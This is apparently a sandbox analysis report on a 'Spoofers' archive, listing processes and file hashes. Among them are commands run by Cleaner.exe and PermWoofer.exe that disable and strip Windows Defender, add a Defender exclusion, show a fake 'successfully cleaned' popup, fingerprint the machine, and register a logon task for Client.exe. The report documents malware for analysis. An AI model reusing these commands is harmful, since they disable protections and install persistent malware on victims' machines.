"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9180b46f8,0x7ff9180b4708,0x7ff9180b4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5468 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap32370:76:7zEvent28521
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Spoofers\READ ME.txt
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Spoofers\Cleaner.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('successfully cleaned', 0, 'cleaner', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Spoofers\Cleaner.exe'
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('successfully cleaned', 0, 'cleaner', 48+16);close()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
"C:\Users\Admin\Downloads\Spoofers\Cleaner.exe"
C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe
"C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ahhaa" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "ahhaa" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=212 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1
C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe
"C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Spoofers\READ ME.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2052,7766717103266424212,3710608717633406784,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6804 /prefetch:8
Network
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 61cef8e38cd95bf003f5fdd1dc37dae1 |
| SHA1 | 11f2f79ecb349344c143eea9a0fed41891a3467f |
| SHA256 | ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e |
| SHA512 | 6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d |
\??\pipe\LOCAL\crashpad_5068_GAVBZAZWQTBHKOGM
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0a9dc42e4013fc47438e96d24beb8eff |
| SHA1 | 806ab26d7eae031a58484188a7eb1adab06457fc |
| SHA256 | 58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151 |
| SHA512 | 868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e59b801f3b70575a7f3d90cbe851dd0c |
| SHA1 | a2356e7e8ae9a5537bf9918f6ed78c44cd19a3b3 |
| SHA256 | ab71116f4d160e60fc1ed2977b05d919478107d06840d3c98940d0e0585cf857 |
| SHA512 | e299a19f5d440fbc584db73ff130c94121cd37ca7b45a356f5fd29eb3ff61ecd9956eb0235c1c03bfb080ebd59face2cb7dff87833528576a0b6b561e662490e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\Spoofers.7z
| MD5 | cb7960f8fb08dc1d63269e205e490b03 |
| SHA1 | 184d929681a0d5ae239f148214ee5d070b1adc69 |
| SHA256 | 4fa37e700c2b9ee257995cc82ad1f02b02bf5b031a5fda15ff34277c82239d8a |
| SHA512 | 852ea8344772464f4bdbca2108a33bc156b2c7d99ff40588a07e98c055a996567496196f5f1fe7512a1d8cb7a8e132942f7c1a157ad45fe6314838c13ed5eb12 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 447014687622af7c638e9cac9c8cc5e9 |
| SHA1 | 66a0809c8e07bdc04b75cfd2db5e56107e933f48 |
| SHA256 | 481d1978d5ed5ef3aff61db52e7df1bd012a5acc119900b10c89f14daca4d69d |
| SHA512 | effa14177e5aec30de25d19fd5eb251534d950c1aeccf6fb0f7049b5af348d2ce3324391ecfef4d1669bd1246fe67ff739507535d6251bbc9b175b3f893f410b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f3b481811acda6405732186d771c982b |
| SHA1 | e1cd46fa562bd3e3cea96ea2d4e6d7b6c66de1c3 |
| SHA256 | b192c26494d6ce61c1d6bcebd2f2f33a00afc67c6937d9dcc0ee1ccf211f83cc |
| SHA512 | 6fc9f2653c8bd0a192a8fec27fa8c35d90f181d81b79bad0c220e2e8cc39a3d5e49f151b1c5d775092edee43630866976be3fe76f6381a86707d4c712d33293c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b7c36ce38b436ef25e0fa17e09849bb8 |
| SHA1 | ae5b15ce1e5ab1d7362498dd93c891df386fd5b8 |
| SHA256 | 01d10f6651ce0eb2d424f174d8714d5a63520bc80b1cf3a6a9dfa53612246e7d |
| SHA512 | 1773b0265cda45e11298dbb5fbffefc2be1661bda08020d64abe6b49163ae2c6e9ce326ae186973a24377897b3577574b3423d01f6b3c195d330d0dbf617f763 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9615e8d6bff6350c81bf6f05bebc83e3 |
| SHA1 | 4cc63a2093c26695755946578dc93310213019d9 |
| SHA256 | 0e15cad0527d5702e19f1502ffbe47c018d38270b154e8b06598e566db4e7340 |
| SHA512 | af9e0cbc6633ae6b8560be85bd116f61a32ac22d70777e7b054e1a7654c0e80bb35ecec36c22d05ec0e86428031eff03bf91f3f1c76bc88b129fc7cfa5648b42 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c81e1385192bacca3c9c0202fd7cdb7f |
| SHA1 | de97da1dfe1dfc6e0e9a5f780440874dd6c19f5d |
| SHA256 | 4a0a5ad8a2259ebd6b01c951d7bc46e3c405886e2e118ec5a75431f6ca80f3bf |
| SHA512 | 22bf9e8616dc14f25bca14b10e168ddbb6aaf8e1404a0d3273ae10485b71e9b9a5ab9980c7fe4e05df5a657c38c7c39a8f940699726059e07217aad4392f450f |
C:\Users\Admin\Downloads\Spoofers\READ ME.txt
| MD5 | b7cc3eee27555abf47add422d2b73853 |
| SHA1 | 7350c15f6aebfa249c35727f10e72025141a22b6 |
| SHA256 | ec81bbefcff680906e9390d6249856c36b8d666dc22e13752ee856641d6b2d34 |
| SHA512 | 8956d4e3560640d7a92b1c5ccf89f7901ff6a70dc611882db49409bb169be5e4d6d3a53879a2cf79e34718c7d5d1044cdd41cc1cf187a215f41b508dde4d3294 |
C:\Users\Admin\Downloads\Spoofers\Cleaner.exe
| MD5 | ba5b980e4d8a2229836b393860cc3b4c |
| SHA1 | b08af0140ef0e54fb99d077b08d97ec5c8ebd52f |
| SHA256 | 89f481a8c2b2b29afbdb45e2bbe01b24346a118aa3775e6a7a28537a54a85e15 |
| SHA512 | bff2841fb6d166abec6a1d3f9ab1fb777f3e1f912e47dea650e4119919310a10cf0399d3d23d4dc700890e327b5b2f8d99fa28c317fb11e56582e83b53a28a5a |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\python312.dll
| MD5 | eb02b8268d6ea28db0ea71bfe24b15d6 |
| SHA1 | 86f723fcc4583d7d2bd59ca2749d4b3952cd65a5 |
| SHA256 | 80222651a93099a906be55044024d32e93b841c83554359d6e605d50d11e2e70 |
| SHA512 | 693bbc3c896ad3c6044c832597f946c778e6c6192def3d662803e330209ec1c68d8d33bd82978279ae66b264a892a366183dcef9a3a777e0a6ee450a928268e2 |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
memory/2476-146-0x00007FF903740000-0x00007FF903E05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI60922\_ctypes.pyd
| MD5 | fa360b7044312e7404704e1a485876d2 |
| SHA1 | 6ea4aad0692c016c6b2284db77d54d6d1fc63490 |
| SHA256 | f06c3491438f6685938789c319731ddf64ba1da02cd71f43ab8829af0e3f4e2f |
| SHA512 | db853c338625f3e04b01b049b0cb22bdaed4e785eb43696aeda71b558f0f58113446a96a3e5356607335435ee8c78069ce8c1bcdb580d00fd4baacbec97a4b6a |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\_sqlite3.pyd
| MD5 | 5f31f58583d2d1f7cb54db8c777d2b1e |
| SHA1 | 494587d2b9e993f2e5398d1c745732ef950e43b6 |
| SHA256 | fad9ffcd3002cec44c3da9d7d48ce890d6697c0384b4c7dacab032b42a5ac186 |
| SHA512 | 8a4ec67d7ad552e8adea629151665f6832fc77c5d224e0eefe90e3aec62364a7c3d7d379a6d7b91de0f9e48af14f166e3b156b4994afe7879328e0796201c8ea |
memory/2476-169-0x00007FF918D40000-0x00007FF918D4F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI60922\_ssl.pyd
| MD5 | e33bf2bc6c19bf37c3cc8bac6843d886 |
| SHA1 | 6701a61d74f50213b141861cfd169452dde22655 |
| SHA256 | e3532d3f8c5e54371f827b9e6d0fee175ad0b2b17e25c26fdfb4efd5126b7288 |
| SHA512 | 3526bcb97ad34f2e0c6894ee4cd6a945116f8af5c20c5807b9be877eb6ea9f20e571610d30d3e3b7391b23ddcd407912232796794277a3c4545cbcb2c5f8ed6f |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\_socket.pyd
| MD5 | da0dc29c413dfb5646d3d0818d875571 |
| SHA1 | adcd7ecd1581bcd0da48bd7a34feccada0b015d6 |
| SHA256 | c3365ad1fee140b4246f06de805422762358a782757b308f796e302fe0f5aaf8 |
| SHA512 | 17a0c09e2e18a984fd8fc4861397a5bd4692bcd3b66679255d74bb200ee9258fb4677b36d1eaa4bd650d84e54d18b8d95a05b34d0484bd9d8a2b6ab36ffffcdb |
memory/2476-165-0x00007FF9062B0000-0x00007FF9062D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI60922\_queue.pyd
| MD5 | 326e66d3cf98d0fa1db2e4c9f1d73e31 |
| SHA1 | 6ace1304d4cb62d107333c3274e6246136ab2305 |
| SHA256 | bf6a8c5872d995edab5918491fa8721e7d1b730f66c8404ee760c1e30cb1f40e |
| SHA512 | d7740693182040d469e93962792b3e706730c2f529ab39f7d9d7adab2e3805bb35d65dc8bb2bd264da9d946f08d9c8a563342d5cb5774d73709ae4c8a3de621c |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\_lzma.pyd
| MD5 | bad668bbf4f0d15429f66865af4c117b |
| SHA1 | 2a85c44d2e6aa09ce6c11f2d548b068c20b7b7f8 |
| SHA256 | 45b1fcdf4f3f97f9881aaa98b00046c4045b897f4095462c0bc4631dbadac486 |
| SHA512 | 798470b87f5a91b9345092593fc40c08ab36f1684eee77654d4058b37b62b40ec0deb4ac36d9be3bb7f69adfdf207bf150820cdbc27f98b0fa718ec394da7c51 |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\_hashlib.pyd
| MD5 | 3a4a3a99a4a4adaf60b9faaf6a3edbda |
| SHA1 | a55ea560accd3b11700e2e2600dc1c6e08341e2f |
| SHA256 | 26eed7aac1c142a83a236c5b35523a0922f14d643f6025dc3886398126dae492 |
| SHA512 | cb7d298e5e55d2bf999160891d6239afdc15ada83cd90a54fda6060c91a4e402909a4623dcaa9a87990f2af84d6eb8a51e919c45060c5e90511cd4aadb1cdb36 |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\_decimal.pyd
| MD5 | b7012443c9c31ffd3aed70fe89aa82a0 |
| SHA1 | 420511f6515139da1610de088eaaaf39b8aad987 |
| SHA256 | 3b92d5ca6268a5ad0e92e5e403c621c56b17933def9d8c31e69ab520c30930d9 |
| SHA512 | ec422b0bee30fd0675d38888f056c50ca6955788d89c2a6448ddc30539656995627cf548e1b3aa2c4a77f2349b297c466af8942f8133ef4e2dfb706c8c1785e9 |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\_bz2.pyd
| MD5 | 82e4f19c1e53ee3e46913d4df0550af7 |
| SHA1 | 283741406ecf64ab64df1d6d46558edd1abe2b03 |
| SHA256 | 78208da0890aafc68999c94ac52f1d5383ea75364eaf1a006d8b623abe0a6bf0 |
| SHA512 | 3fd8377d5f365499944a336819684e858534c8a23b8b24882f441318ec305e444e09125a0c0aedc10e31dbf94db60b8e796b03b9e36adbad37ab19c7724f36ee |
